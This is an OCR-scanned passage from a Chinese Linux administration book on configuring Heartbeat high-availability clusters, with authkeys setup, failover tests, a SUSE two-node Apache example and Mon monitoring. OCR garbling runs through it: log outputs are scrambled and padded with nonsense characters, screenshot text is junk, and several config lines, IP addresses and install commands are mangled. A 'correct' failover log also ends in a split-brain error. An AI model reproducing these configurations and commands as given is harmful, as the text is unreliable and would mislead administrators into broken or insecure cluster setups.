可 以 让 Heartbeat 每 次 启动 时 都 启动 一 个 守护 程序 ， 如 果 该 守护 程序 停止 运行 ， 就 自动 重 
启 它 ， 为 此 ， 在 /etc/ha.d/ha.cf 文件 中 使 用 下 一 行 命令 : 


Respawn userid /usr/bin/mydaemon 


注意 ， 这 样 的 守护 程序 (本 例 中 称 为 /usr/bin/mydaemon) 不 会 故障 转移 到 备份 服务 器 。 如 
果 使 用 该 方法 启动 一 个 守护 程序 ， 则 它 在 Heartbeat 运行 时 总 是 会 运行 ， 因 此 该 技术 可 能 仅 对 
需要 与 Heartbeat 一 起 在 主 服务 器 和 备份 服务 器 上 运行 的 守护 程序 有 用 。 

对 于 那些 通常 需要 用 respawn 选项 的 init 启动 ,或 者 那些 需要 从 主 服务 器 向 备份 服务 器 (在 
一 个 良好 的 高 可 用 配置 中 , ha.cf、haresources 和 authkeys 文件 在 主 服 务 器 和 备份 服务 器 上 将 相 
同 ) 故障 转移 的 高 可 用 守护 程序 (如 一 个 串 行 电信 程序 : Hyldfax) ， 则 必须 使 用 包含 Heartbeat 
软件 包 中 的 cl_respawn 程序 ， 或 者 与 Heartbeat 一 起 使 用 的 单独 软件 包 ， 如 Daemon Tools。 


5.1.6 ”配置 /etc/ha.d/authkeys 


本 节 中 , 将 安装 名 为 /etc/ha.d/authkeys 的 安全 配置 文件 , 通过 下 面 的 操作 , 包含 在 Heartbeat 
发 行 版 中 的 示范 配置 文件 将 被 修改 ， 从 而 保护 配置 免 受 攻击 。 
加 用 以 下 命令 将 示范 的 authkeys 文件 定位 并 复制 到 指定 位 置 。 


#rpm -qd HeartBeat | grep authkeys 
#cp /usr/share/doc/packages/HeartBeat/authkeys /etc/ha.d 
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[02] 编辑 /etc/ha.d/authkeys 文件 ， 如 下 所 示 : 


authl 
1 shal testlab 


在 该 例 中 ，testlab 是 数字 签名 密 钥 ， 用 于 Heartbeat 软件 包 的 数字 签名 ，Secure Hash 
Algorithm 1 (sha 1) 则 是 用 于 数字 签名 的 方法 ， 将 该 例 中 的 testlab 改 为 自己 创建 的 口令 ， 并 
确保 口令 在 两 个 系统 上 一 致 。 

贺 确保 authkeys 仅 能 由 root 用 户 读 取 : 


#chmod 600 /etc/ha.d/authkeys 


注意 : 如 果 用 chmod 命令 改变 该 文件 的 安全 配置 失败 ，Heartbeat 程序 将 不 会 启动 ， 并 且 
将 在 /var/log/messages 文件 中 发 出 “对 该 文件 的 安全 配置 不 正确 ”的 警告 。 


5.1.7 ”在 备份 服务 器 上 安装 Heartbeat 
在 主 服务 器 上 执行 下 面 的 命令 ， 将 所 有 配置 文件 复制 到 备份 系统 : 


#scp -r /etc/ha.d backupnode:/etc/ha.d 


这 里 backupnode 是 IP 地 址 或 备份 服务 器 的 主机 名 称 (如 在 主 服 务 器 上 的 /etc/hosts 目录 下 
所 定义 的 ) 。scp 命令 是 安全 的 复制 命令 ,使 用 SSH 协议 在 两 节点 间 复 制 数据 。scp 的 -r 选项 
用 于 循环 复制 主 服务 器 上 /etc/ha.d 目录 下 的 所 有 文件 和 目录 。 

在 第 一 次 运行 此 命令 时 , 复制 操作 开始 前 将 会 询问 是 否 确实 想 要 允许 该 连接 。 而且， 如果 
还 没有 将 备份 服务 器 的 私有 密 钥 插入 到 root 账户 在 主 服务 器 的 SSH 配置 中 ， 则 在 备份 服务 器 
上 将 被 提示 输入 root 口令 。 


5.1.8 设置 系统 时 间 


虽然 Heartbeat 不 要 求 主 服务 器 和 备份 服务 器 具有 同步 的 系统 时 钟 ， 但 这 两 台 服务 器 上 的 
系统 时 间 的 差异 应 在 几 分 钟 之 内 ,否则 在 某 些 情况 下 ,一 些 高 可 用 服务 就 可 能 行为 失常 。 在 两 
个 系统 上 启动 Heartbeat 之 前 ， 应 当 人 工 检 验 并 设置 系统 时 间 (使 用 date 命令 ) 。 


注意 : 作为 一 个 更 好 的 长 期 解决 方案 ， 应 该 用 NPT 软件 同步 这 两 个 系统 的 时 钟 。 


5.1.9 启动 Heartbeat 


为 确保 已 正确 建立 配置 文件 ， 在 启动 Heartbeat 守护 程序 前 ， 应 在 主 服务 器 和 备份 服务 器 
上 运行 ResourceManager 测试 : 


#/usr/lib/HeartBeat/ResourceManager listkeys '/bin/uname -n' 


这 一 命令 用 来 查看 /etc/ha.d/haresources 文件 并 返回 资源 列表 (或 资源 密 钥 ) 。 迄 今 为 止 ， 
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唯一 定义 的 资源 是 测试 资源 ， 所 以 这 个 命令 的 结果 将 会 非常 简单 。 如 下 所 示 : 


nn 


案 


秒 ) 


Test 


用 以 下 命令 之 一 启动 Heartbeat (在 主 服务 器 上 ) : 


#/etc/init.d/HeartBeat start 


或 者 : 


#service HeartBeat start 


然后 通过 如 下 命令 再 查看 系统 日 志 : 


#tail /var/log/messages 


在 Heartbeat 开始 启动 过 程 中 , 为 避免 每 隔 几 分 钟 重新 输入 这 一 命令 , 可 用 以 下 命令 让 tail 
命令 在 被 追加 到 /var/log/messages 文件 时 在 屏幕 上 显示 新 信息 : 


#tail -f /var/log/messages 


按 Cal+C 组 合 键 退出 该 命令 。 


接 下 来 还 可 以 用 tail -farlog/ha-log 命令 进一步 监视 Heartbeat 正在 做 什么 ， 不 过 ， 此 方 
的 例子 将 一 直 使 用 文件 /varlog/messages 〈 这 并 不 改变 产生 的 日 志 数 量 ) 。 

在 Heartbeat 完成 启动 程序 之 前 ， 它 会 等 待 时 长 为 /etc/ha.d/ha.cf 文件 中 配置 的 initdead 时 
间 ， 所 以 必须 至 少 等 待 两 分 钟 ，Heartbeat 才能 启动 (在 测试 配置 文件 中 ，initdead 被 设 为 120 


o 


当 Heartbeat 成 功 启动 时 ,将 会 在 /var/log/messages 文件 中 看 到 下 面 的 消息 (为 了 增加 这 些 
消息 的 可 读 性 ， 已 经 移 除了 这 些 行 开 始 处 的 时 戳 信 息 ) : 


primary root: test called with 


primary HeartBeat 
primary HeartBeat 
<version> 

primary HeartBeat 
primary HeartBeat 
primary HeartBeat 
primary HeartBeat 


4410]: 
4410]: 


4411]: 
2882]: 
[4411]: 
4411]: 


(694) interface ethl 


primary HeartBeat 
primary HeartBeat 
primary HeartBeat 
primary HeartBeat 
primary HeartBeat 
primary HeartBeat 


[4414] : 
4415] : 
4416] : 
4416] : 
4411] : 
4416] : 


info: 
info: 


info: 
WARN: 
info: 
info: 


info: 
info: 
info: 
info: 
info: 
info: 


status 
闫 六 碳 灾 类 六 妆 突 实 商 庙 贡 闪 商 次 志 宙 奖 交 奖 灾 闪闪 类 六 


Configuration validated. Starting HeartBeat 


HeartBeat: version <version> 

No Previous generation - starting at 15] 
HeartBeat generation: 1 

UDP Broadcast HeartBeat started on port 694 


pid 4414 locked in memory. 

pid 4415 locked in memory. 

pid 4416 locked in memory. 

Local status now set to: !up' 
pid 4411 locked in memory. 

Local status now set to: 'active' 


primary logger: test called with status 


primary last message repeated 2 times 


primary HeartBeat: info: Acquiring resource group: primary.mydomain.com test 


primary HeartBeat: info: Running /etc/init.d/test start 
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primary logger: test called with start 


primary HeartBeat [4417]: info: Resource acquisition completed. 


primary HeartBeat [4416]: info: Link primary.mydomain.com:ethl1 up- 


利用 status 参数 调用 本 章 前 面 创建 的 测试 脚本 ， 因 此 Heartbeat 假定 守护 程序 没有 运行 ， 
并 用 start 参数 运行 脚本 来 获得 测试 资源 〈 此 时 它 其 实 并 不 做 任何 事情 ) ， 这 些 可 以 在 前 面 的 


输出 中 看 到 。 


注意 这 一 行 : 


primary.mydomain.com HeartBeat [2886] : WARN: node backup.mydomain.com: is dead 


Heartbeat 发 出 备份 服务 器 死机 的 警告 ， 原 因 是 在 备份 服务 器 上 Heartbeat 守护 程序 还 没有 


启动 。 


5.1.10 在 备份 服务 器 上 启动 Heartbeat 
一 旦 Heartbeat 在 主 服务 器 上 运行 ， 登 录 到 备份 服务 器 并 用 以 下 命令 启动 Heartbeat: 


# /etc/init.d/HeartBeat start 


备份 服务 器 上 的 /var/log/messages 文件 应 该 很 快 出 现 如 下 内 容 : 


backup 
backup 


HeartBeat [4650] : infO: * 炎 火炎 火炎 火 交 炎炎 交 交 交 碳 交 交 交 交 次 庙 认 庙 庙 闪闪 六 


HeartBeat [4650]: info: Configuration validated. Starting HeartBeat 


<version> 


backup 
backup 
backup 


HeartBeat [4651]: info: HeartBeat: version <version> 
HeartBeat[4651]: info: HeartBeat generation: 9 
HeartBeat[4651]: info: UDP Broadcast HeartBeat started on port 694 


(694) interface ethl 


backup 
backup 
backup 
backup 
backup 
backup 
backup 
backup 
backup 
backup 
backup 


HeartBeat[4654]: info: pid 4654 locked in memory. 
HeartBeat[4655]: info: pid 4655 locked in memory. 
HeartBeat[4656]: info: pid 4656 locked in memory. 
HeartBeat[4656]: info: Local status now set to: 'up' 
HeartBeat[4651]: info: pid 4651 locked in memory. 
HeartBeat[4656]: info: Link backup.mydomain.com:ethl up. 
HeartBeat[4656]: info: Node primary.mydomain.com: status active 
HeartBeat: info: Running /etc/ha.d/rc.d/status status 
HeartBeat: info: Running /etc/ha.d/rc.d/ifstat ifstat 
HeartBeat: info: Running /etc/ha.d/rc.d/ifstat ifstat 
HeartBeat[4656]: info: No local resources [/usr/lib/HeartBeat/ 


ResourceManager listkeys backup.mydomain.com] 


backup. 


mydomain.com HeartBeat[4656]: info: Resource acquisition completed. 


注意 : 在 以 上 输出 中 Heartbeat 如 果 宣 告 这 台 机 器 (备份 服务 器 在 /etc/ha.d/haresources 
文件 中 没有 任何 本 地 资源 , 该 机 器 将 作为 备份 服务 器 并 闲置 , 它 只 监听 来 自主 服务 器 的 心跳 直 
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到 主 服务 器 失败 为 止 。Heartbeat 不 需要 运行 测试 脚本 (/etc/ha.d/resource.d/test) 。Resource 
acquisition completed 消息 有 一 些 误导 ， 因 为 对 于 Heartbeat 根本 没有 可 以 接收 的 资源 。 


注意 : 所 有 在 hareresources 文件 中 提 到 的 资源 脚本 文件 都 必须 存在 ， 并 且 在 Heartbeat 启 
动 前 具有 执行 权限 。 


5.1.11 检查 主 服务 器 上 的 日 志文 件 


既然 备份 服务 器 已 经 启动 并 运行 ， 主 服务 器 上 的 Heartbeat 就 应 该 在 检测 来 自 备 份 服务 器 
上 的 心跳 了 。 在 /var/log/messages 文件 末尾 可 以 看 到 如 下 的 信息 : 


primary HeartBeat [2886]: info: HeartBeat restart on node backup.mydomain.com 
primary HeartBeat [2886]: info: Link backup.mydomain.com:eth2 up. 

primary HeartBeat [2886]: info: Node backup.mydomain.com: status up 

primary HeartBeat: info: Running /etc/ha.d/rc.d/status status 

primary HeartBeat: info: Running /etc/ha.d/rc.d/ifstat ifstat 

primary HeartBeat [2886]: info: Node backup.mydomain.com: status active 


primary HeartBeat: info: Running /etc/ha.d/rc.d/status status 


如 果 主 服务 器 不 能 自动 识别 备份 服务 器 是 否 运行 ， 则 要 检验 并 确保 两 台 机 器 在 同一 网 络 上 ， 
它们 具有 相同 的 广播 地 址 ， 并 且 没 有 防火 墙 规 则 正在 过 滤 数 据 包 在 两 个 系统 上 使 用 这 onfig 命 
令 并 比较 bcast 数字 ; 两 者 的 数值 应 该 相同 ) ， 也 可 以 用 tcpdump 命令 来 查看 心跳 广播 是 否 到 达 这 
两 个 节点 : 


#tcpdump -i all -n -p udp port 694 


该 命令 应 当 捕 获 并 显示 来 自主 服务 器 或 备份 服务 器 的 心跳 广播 数据 包 。 


5.1.12 ”停止 并 启动 Heartbeat 
通过 下 面 命令 之 一 停止 主 服 务 器 上 的 Heartbeat: 


#/etc/init.d/HeartBeat stop 


#service HeartBeat stop 


将 看 到 备份 服务 器 宣布 主 服 务 器 失败 ， 然 后 它 将 用 start 参数 运行 /etc/ha.d/resource.d/test 
脚本 。 备 份 服务 器 上 的 /var/log/messages 文件 包括 下 面 这 些 消息 : 


backup.mydomain.com HeartBeat [5725] : WARN: node primary.mydomain.com: is dead 
backup.mydomain.com HeartBeat[5725]: info: Link primary.mydomain.com:ethl 
dead. 

backup.mydomain.com HeartBeat: info: Running /etc/ha.d/rc.d/status status 
backup.mydomain.com HeartBeat: info: Running /etc/ha.d/rc.d/ifstat ifstat 


backup.mydomain.com HeartBeat: info: Taking over resource group test 


Linux ”企业 应 用 案例 精 解 


*## /etc/ha.d/resource.d/test called with status 

backup.mydomain.com HeartBeat: info: Acquiring resource group: 
primary.mydomain. 

com test 

backup.mydomain.com HeartBeat: info: Running /etc/ha.d/resource.d/test start 
*#* /etc/ha.d/resource.d/test called with start 


backup.mydomain.com HeartBeat: info: mach down takeover complete. 


/etc/ha.d/resource.d/test 资源 或 脚本 将 首先 用 status 参数 调用 ， 然 后 用 start 参数 调用 ， 以 完 
成 故障 转移 。 一 旦 完成 ， 尝 试 在 主 服务 器 上 再 次 启动 Heartbeat 并 监视 发 生 的 情况 。 在 备份 服 
务 器 上 的 测试 脚本 应 该 用 stop 参数 调用 ， 并 且 应 在 主 服务 器 上 通过 start 参数 调用 。 


注意 : 如 果 Heartbeat 数据 包 继 续 到 达 备 份 服务 器 ， 则 故障 转移 不 会 发 生 ， 因 此 ， 如 果 在 
文件 /etc/ha.d/ha.cf 中 为 Heartbeat 指定 了 两 条 路 径 〈 如 一 个 无 猫 的 串 行 电缆 和 一 个 交叉 的 以 太 
网 电缆 )， 则 只 断 开 其 中 一 条 物理 路 径 不 会 导致 故障 转移 一 一 在 备份 服务 器 开始 初始 化 一 个 故 
障 转移 之 前 ， 两 条 线 都 必须 断 开 。 


5.1.13 ”监视 资源 


Heartbeat 当前 并 不 监视 自己 启动 的 资源 ， 以 查看 它们 是 否 运行 、 是 否 正常 以 及 客户 
端 计 算 机 是 否 能 够 访问 ， 要 监视 这 些 资 源 ， 需 要 使 用 一 个 被 称 作 Mon 的 独立 软件 包 (第 
17 章 讨论 ) 。 

据 此 ， 一 些 系统 管理 员 试 图 把 Heartbeat 放 在 生产 网 络 上 ，Heartbeat 数据 包 ， 客 户 端 计 算 
机 对 资源 的 访问 使 用 单个 网 络 。 这 一 想法 开始 听 起 来 不 错 , 因为 主 服 务 器 连接 生产 网 络 的 故障 
转移 意味 着 客户 端 计算 机 不 能 访问 资源 , 而 且 故 障 转 移 到 备份 服务 器 将 恢复 对 资源 的 访问 。 不 
过 ， 这 一 故障 转移 也 可 能 是 不 必要 的 〈 如 果 是 网 络 的 问题 而 非 主 服务 器 ) ， 而 且 可 能 不 会 有 任 
何 改 进 。 或 者 更 糟 的 是 ， 这 样 做 可 能 导致 裂 脑 情况 。 

例如 ， 如 果 该 资源 是 一 个 共享 SCSI， 如 果 生 产 网 络 网 线 与 备份 服务 器 断 开 ， 裂 脑 的 情况 
就 会 出 现 , 这 就 意味 着 两 个 服务 器 都 错误 地 认为 它们 可 以 独自 写 访问 同一 个 磁盘 驱动 器 , 因而 
可 能 会 损坏 或 破坏 共享 扇 区 上 的 数据 。 如 果 主 服务 器 不 再 正常 ， 根 据 开发 Heartbeat 的 高 可 用 
设计 原则 ，Heartbeat 只 能 向 备份 服务 器 故障 转移 。 用 生产 网 络 作为 Heartbeat 的 一 条 而 且 是 唯 
一 的 一 条 路 径 是 应 该 予以 避免 的 坏 做 法 。 


注意 : 通常 ， 使 用 Heartbeat 数据 包 的 唯一 理由 是 确保 对 单机 上 运行 的 资源 的 独占 访问 。 
如 果 多 机 可 以 同时 提供 服务 并且 不 要 求 独占 访问 ) ， 那 么 Heartbeat 高 可 用 故障 转移 配置 应 
当 避 免 复杂 化 。 


5.1.14 小 结 
本 节 用 一 个 “测试 ”资源 脚本 演示 当主 服务 器 崩溃 以 后 ，Heartbeat 如 何 启动 一 个 资源 并 
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把 故障 转移 到 备份 服务 器 。 学 习 了 使 用 3 个 配置 文件 /etc/ha.d/ha.cf、/etc/ha.d/haresources 和 
/etc/ha.d/authkeys 的 示范 配置 。 为 避免 Heartbeat 系统 中 的 冲突 和 错误 行为 , 这 些 配置 文件 应 该 
总 是 在 主 服务 器 和 备份 服务 器 上 保持 一 致 。 


5.2 ”企业 服务 器 搭建 双 机 集群 配置 


有 了 上 节 对 Heartbeat 双 机 范例 讲解 的 基础 ， 从 这 节 起 我 们 开始 介绍 实际 应 用 案例 。 首 先 
讲解 的 是 SUSE 企业 版 的 集群 软件 。SUSE 企业 版 里 提供 的 HA 软件 是 一 款 专 业 的 高 可 用 集群 
软件 产品 , 它 不 仅仅 是 一 款 双 机 热 备 软件 , 还 为 您 提供 了 Linux 平台 上 完整 的 高 可 用 性 解决 方 
案 。 当 集群 中 的 某 个 节点 由 于 软件 或 硬件 原因 发 生 故 障 时 , 集群 系统 可 以 把 资源 切换 到 其 他 健 
康 的 节点 上 , 使 整个 系统 能 连续 不 间断 地 对 外 提供 服务 , 从 而 为 机 构 24X365 的 关键 业务 提供 
可 靠 的 保障 , 达到 了 系统 99.999% 的 高 可 用 性 和 可 靠 性 (如果 是 5 个 9 的 可 靠 性 意味 着 一 年 的 
停机 时 间 为 5.15 分 钟 ， 如 果 是 4 个 9， 则 是 不 超过 52.30 分 钟 ， 很 显然 不 在 一 个 档次 上 ， 这 里 
包括 正常 维护 的 停机 时 间 ) 。SUSE Enterprise Linux 10.0 是 内 置 Linux 2.6.16 内 核 的 企业 级 服 
务 器 ， 较 之 SUSE Enterprise Linux 9.0， 它 在 性 能 、 可 扩展 性 、 易 管理 性 和 安全 性 等 方面 都 予 
以 加 强 , 并 有 众多 硬件 和 应 用 软件 支持 。 最近， 笔者 使 用 SUSE Enterprise Linux 10.0 作为 系统 
平台 (使 用 其 他 Linux 平台 在 安装 部 署 时 可 能 有 小 差异 ), 在 其 上 采用 Heartbeat、 Mon 和 Rsync 
等 开源 软件 打造 了 一 个 高 可 用 系统 ， 挖 掘 了 SUSE Linux 的 高 可 用 性 。 下 面 将 为 大 家 详细 介绍 
如 何在 SUSE Linux 平台 上 搭建 双 机 的 配置 过 程 。 


5.2.1 Heartbeat、Mon、Rsync 简介 


Heartbeat 是 一 个 高 可 用 性 解决 方案 , 其 官方 网 站 是 www.linux-ha.org。Heartbeat 目前 已 被 
广泛 应 用 , 是 很 多 商业 高 可 用 性 软件 的 重要 组 成 部 分 。 大 多 数 Linux 厂商 已 经 把 它 很 好 地 集成 
在 自己 的 系统 中 ， 例 如 SUSE Linux、Red Hat 和 Debian Linux 等 。 此 外 ，Heartbeat 也 能 很 好 
地 部 署 在 Solaris 和 FreeBSD 系统 上 。 

Mon 是 一 个 后 台 服务 运行 情况 的 监控 和 告警 软件 ， 能 够 对 大 多 数 标准 服务 进行 监控 和 告 
警 ， 其 中 包括 SMTP 服务 、Telnet 服务 、FTP 服务 、NNTP 服务 、HTTP 服务 、POP3 服务 、 
Samba 服务 和 NFS 服务 等 , 还 可 以 自己 编写 告警 事件 和 自 定 义 服务 。 在 本 系统 中 , 将 使 用 Mon 
对 两 台 主机 的 网 络 连接 情况 和 服务 运行 情况 进行 监控 ， 目 的 是 及 时 告警 ， 并 且 自 动 恢 复 服 务 。 

Rsync 是 一 个 用 于 数据 同步 的 软件 ， 除 了 数据 复制 外 ， 还 有 增 量 备份 、 同 步 owner、group 
和 文件 权限 等 重要 信息 的 功能 。 在 本 系统 中 , 使 用 Rsync 来 同步 主 服务 器 和 备用 服务 器 的 数据 。 


5.2.2 ”安装 环境 


首先 ， 需 要 准备 两 台 PC 服务 器 ， 每 台 服 务 器 有 两 块 网 卡 ， 其 网 络 拓扑 图 如 图 5.2 所 示 。 


Linux ”企业 应 用 案例 精 解 


SUSE linux2 
192.168.9.93 
10.1.1.2 


SUSE Linux 
192.168.8.92 
10.11.1 


图 5.2 网 络 拓扑 图 


在 YaST2 控制 中 心里 有 “高 可 用 性 ”图 形 化 的 配置 向 导 ， 因 此 这 里 不 再 介绍 过 程 ， 重 在 
讲述 原理 和 方法 ， 主 要 是 基于 命令 行 的 配置 方式 。 首 先 在 PC 服务 器 上 安装 SUSE Enterprise 
Linux 10.0 系统 ， 并 将 eth0 配置 为 192.168.8.* 网 段 ，ethl 配置 为 10.1.1.* 网 段 ，eth0 链接 对 外 
的 交换 机 ，ethl 用 于 两 台 机 器 的 对 连 。 

修改 /etc/hosts 文件 ， 内 容 如 下 : 


10.1.1.1 linuxl 
10.1.1.2 linux2 
192.168.8.92 svrl 
192.168.8.93 svr2 
192.168.8.112 svr 


注意 : 10.1.1.* 为 心跳 线 卫 地 址 ，192.168.8.* 为 对 外 ，192.168.8.112 为 浮动 IP。 
并 且 ， 复制 hosts 文件 到 linux2 上 : 

#scp /etc/hosts 10.1.1.2:/etc 

同时 ， 关 闭 不 需要 的 服务 如 下 : 


chkconfig -s alsasound off 
chkconfig -s nfs off 
chkconfig -s nfsboot off 
chkconfig -s portmap off 
chkconfig -s slpd off 
chkconfig -s smbfs off 
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chkconfig -s setserial off 
chkconfig -s splash off 
chkconfig -s splash early off 
chkconfig -s splash late off 
chkconfig -s xdm off 
chkconfig -s fbset off 
chkconfig -s cups off 
chkconfig -s nscd off 
chkconfig -s random off 


最 后 ， 修 改 启动 级 别 为 3， 找 到 /etc/inittab 文件 的 如 下 几 行 : 

#The default runlevel is defined here id: 5: initdefault: 
将 其 改 为 如 下 : 

#The default runlevel is defined here id: 3: initdefault: 


5.2.3 安装 Heartbeat 


通过 YaST2 工具 添加 Heartbeat， 如 图 5.3 所 示 。 
文件 曲 软 件 包 中 额外 日 帮助 


过 滤器 w: 蜡 直 7] 
到 evmsha EVM: {A Utilities 
有 MA nearbeat The Heartbeat Subsystem forHighAvallabllty Linux 
E DA heanbeatempl Heartbeat CIM Providt 
口 公共 的 代码 库 DE her ent aweciard A Monitanng Dermon {or Munnaining High Raabilty Re] 
Deg Novell AppArmor DA hearbeatplls AGeneralPlugin and interace Loading Library 
乓 高 可 用 性 sh, A ara or Set Th me hada Tn ead 
a Documentaton octiaconsole .Oracle Cluser Flesysiem 2 GUItools 
用 半 服 务 归 有 GNOME 上面 于 cs24ools Oracle Cluster File System 2 Core Tools 
口 用 于 服务 器 的 koe 桌 面 环 境 
bx 窗口 系统 
口 
,加 打印 服务 
口 邮件 和 新 闻 服务 器 
口 wee 和 Lamp 服 
口 因特网 网 关 可 iD 
口 ohcp 和 pws 服务 器 0 ees 
口 昌 录 服 务 各 (iow) [ET ES mE | 
口 sr 基本 应 用 程序 服务 器 UU 
日 sr 六 帮 训 局 可 i 
xen 虚拟 机 器 主管 服务 器 加 
口 基于 we 的 企业 管理 自 Drbd isa distributed replicated block device It mirrors a block device overthe 
下 便 用 情况 | [已 用 [可 用 [总计 | 1 
| 
jr | 检查 | 口 自动 检查 [了 | [ 接受 w 


图 5.3 ”Heartbeat 安装 
(1) 安装 Heartbeat 软件 包 
可 以 通过 SUSE 的 光盘 进行 安装 ， 安 装 命令 如 下 : 


#rpm -Uvh HeartBeat-1.2.2-0.6.i586.rpm libnet-1.1.1~42.1.1586:rpm 
HeartBeat-pils-1.2.2- 
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0.6.i586.rpm HeartBeat-stonith-1.2.2-0.6.i1586.rpm 


(2) 修改 Heartbeat 的 配置 文件 
@ 修改 主 配置 文件 /etc/ha.d/ha.cf。 


将 /usr/share/doc/packages/Heartbeat/ 目 录 下 的 ha.cf、 authkeys、haresources 三 个 文件 复制 到 


/etc/ha.d/ 目 录 下 ， 再 将 主 配置 文件 /etc/ha.d/ha.cf 修改 如 下 : 


node linuxl 

node linux2 
keepalive 2 
deadtime 30 
warntime 10 
initdead 120 
auto failback on 
bcast ethl 

ping 953: 
Bing Lot 
respawn hacluster /usr/lib/HeartBeat/ipfail 


@ 修改 认证 方式 文件 /etc/ha.d/authkeys。 
修改 认证 方式 文件 /etc/ha.d/authkeys 如 下 : 


auth 2 


2 crc 


@ 修改 资源 配置 文件 /etc/ha.d heresources。 


假设 现在 正在 进行 Apache 服务 的 HA 系统 ， 这 里 设置 的 服务 必须 在 /etc/ha.d/resource.d 和 


/etc/re.d/init.d 下 有 响应 的 脚本 。 修 改 资 源 配置 文件 /etc/ha.d/haresources 如 下 : 
linuxl 192.168.8.112 apache2 
@ 复制 配置 文件 到 linux2。 


#scp /etc/ha.d/ha.cf 10.1.1.2:/etc/ha.d 
#scp /etc/ha.d/authkeys 10.1.1.2:/etc/ha.d 
#scp /etc/ha.d/haresources 10.1.1.2:/etc/ha.d 


(3) 启动 Heartbeat 服务 


#chkconfig -s HeartBeat on 
#chmod 600 /etc/ha.d/authkeys 
#/etc/init.d/HeartBeat start 


系统 显示 信息 如 下 : 


Starting High-Availability servicesHeartBeat:2010/4/01 23:05:19 


info: 
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Neither logfile nor logfacility found. 
HeartBeat: 2010/4/01 23:05:19 info: Logging defaulting to /var/log/ha-log 
Heartpeat; 2010/4/01 23:055I9 LEOS*A 关 六 帮 夺 丰 夺 下 新 入 尖 涡 加 吉 淖 剖 守 有 寺 涡 珊 兴 六 
HeartBeat: 2010/4/01 23:05:19 info:Configuration validated.starting 
HeartBeat 1.2.2 


done 
通过 运行 “ps -eflgrep Heartbeat” 命 令 来 查看 进程 : 


root 4240 1 0 23:25 ? 00: 00: 01 HeartBeat:HeartBeat:master control process 
nobody 4242 4240 0 23:05 ? 00:00:00 HeartBeat:HeartBeat:FIFO reader 
nobody 4243 4240 0 23:05 ? 00:00:00 HeartBeat:HeartBeat:write:bcast ethl 
nobody 4244 4240 0 23:05 ? 00:00:00 HeartBeat:HeartBeat:read:bcast ethl 
nobody 4245 4240 0 23:05 ? 00:00:00 HeartBeat:HeartBeat:write:ping 10.1.1.1 
nobody 4246 4240 0 23:05 ? 00:00:00 HeartBeat:HeartBeat:read:ping 10.1.1.1 
nobody 4247 4240 0 23:05 ? 00:00:00 HeartBeat:HeartBeat:write:ping 10.1.1.2 
nobody 4248 4240 0 23:05 ? 00:00:00 HeartBeat:HeartBeat:read:ping 10.1.1.2 
haclust 4254 4240 0 23:07 ? 00:00:00 /usr/lib/HeartBeat/ipfail 


(4) 安装 Apache 
Q@ 安装 Apache 和 相关 软件 包 如 下 : 


#rpm -Uvh apahe2-2.0.49-27.8.i586.rpm apache2-prefork-2.0.49-27.8.i586.rpm 
libapr0-2.0.49-27.8.i586.rpm 
#SuSEconfig --module apache2 


@) 启动 Apache: 


/etc/init.d/apache2 start 
运行 “ps -eflgrep apache ”查看 进程 : 


root 4387 1 10 23:33 ? 00:00:00 /usr/sbin/httpd2-prefork -f /etc/apache2/ 
httpd.conf 

wwwrun 4388 4387 0 23:33 ? 00:00:00 /usr/sbin/httpd2-prefork -f /etc/apache2/ 
httpd.conf 

wwwrun 4389 4387 0 23:33 ? 00:00:00 /usr/sbin/httpd2-prefork -f /etc/apache2/ 
httpd.conf 

wwwrun 4390 4387 0 23:33 ? 00:00:00 /usr/sbin/httpd2-prefork -f /etc/apache2/ 
httpd.conf 

wwwrun 4391 4387 0 23:33 ? 00:00:00 /usr/sbin/httpd2-prefork -f /etc/apache2/ 
httpd.conf 

wwwrun 4392 4387 0 23:33 ? 00:00:00 /usr/sbin/httpd2-prefork -f /etc/apache2/ 
httpd.conf 
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@ 创建 并 编辑 一 个 index.html 文件 : 
#vi /srv/www/htdocs/index.html 


在 其 中 输入 “linux ha” 的 字样 ， 并 保存 退出 。 通 过 Client 端 访问 浮动 IP: 192.168.8.112， 
在 linuxl 上 成 功 安装 Apache 服务 后 ,在 linux2 上 执行 以 上 操作 ， 并 且 同 样 测试 其 结果 ， 如 图 
5.4 所 示 。 


E a 
[a | Ele Edit View Higory Bookmaris Icols Help 
外 - 定 -@ 谷 [wenerasrz IIeEE 


DsusE Un Enerainment DD News Dinermet Soareh E) Reterence ED) Maps and Directons [DD) Shopping 


Linux Ha lt works! 


图 5.4 Linux 上 的 测试 结 


5.2.4 测试 HA 系统 
首先 ， 关 闭 linuxl 的 网 络 服务 (也 可 以 使 用 shutdown) : 


#/etc/init.d/network stop 


然后 ， 查 看 linux2 的 log 文件 。 正 确 结果 是 HA 系统 发 现 linuxl 已 经 dead， 由 linux2 接 
蔡 其 工作 : 
#tail -f /var/log/ha-log 


HeartBeat: 2010/4/02 14:18:16 WARN: node 10.1.1.1:is dead 
HeartBeat: 2010/4/02 14:18:16 info: Link 证 人 下 


HeartBeat: 2010/4/02 14:18:27 info: mach down takeover complete. 

HeartBeat: 2010/4/02 14:18:27 info: mach down takeober complete for node 
linuxl. 

HeartBeat: 2010/4/02 14:18:27 ERROR: Both machines own our resources! 


同时 ， 在 linux2 上 面 检查 浮动 人 ， 此 时 浮动 人 P 应 该 绑 定 在 linux2 上 。 
这 时 ， 通 过 Client 端 访 问 浮动 P: 192.168.8.112，HTTP 服务 正常 : 
Eth0:0 Link encap:Ethernet HWaddr 00:0C:29:35:E6:63 
Inet addr:192:168.0:112 bcast:192.168.9.:255 Mask:255:255:254.0 
Interrupt:9 Base address:0x1000 
重新 启动 linuxl 的 网 络 服 务 ， 浮 动 PP 将 重新 绑 定 到 linux1。 此 时 通过 Client 端 访问 浮动 
IP: 192.168.8.112，HTTP 服务 同样 正常 。 


5.2.5 ”Mon 服务 监控 
使 用 Mon 可 以 实现 监控 网 络 、 监 控 服务 、E-mail 告警 和 自动 重启 服务 等 。 


(1) 安装 Mon 软件 及 其 相关 软件 包 
从 光盘 安装 Time-period、Convert-BER、perl-Mon 和 fping: 


从 www.cpan.org 下 载 并 安装 Time-HiRes: 


从 www.kernel.org/software/mon/ 下 载 并 安装 软件 包 mon-0.99.2.tar.bz2: 


(2) 编辑 /etc/mon/mon.cf 文件 
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interval lm 
monitor http.monitor 
period wd {Sun-Sat} 
alert apacherestart.alert 
alert mail.alert 97140@263.com (请 指定 邮件 地 址 ) 


然后 编辑 /ust/lib/mon/alert.d/apacherestart.alert 文件 : 


#!/bin/sh 
/etc/init.d/apache2 restart 
chmod +x /usr/lib/mon/alert.d/apacherestart.alert 


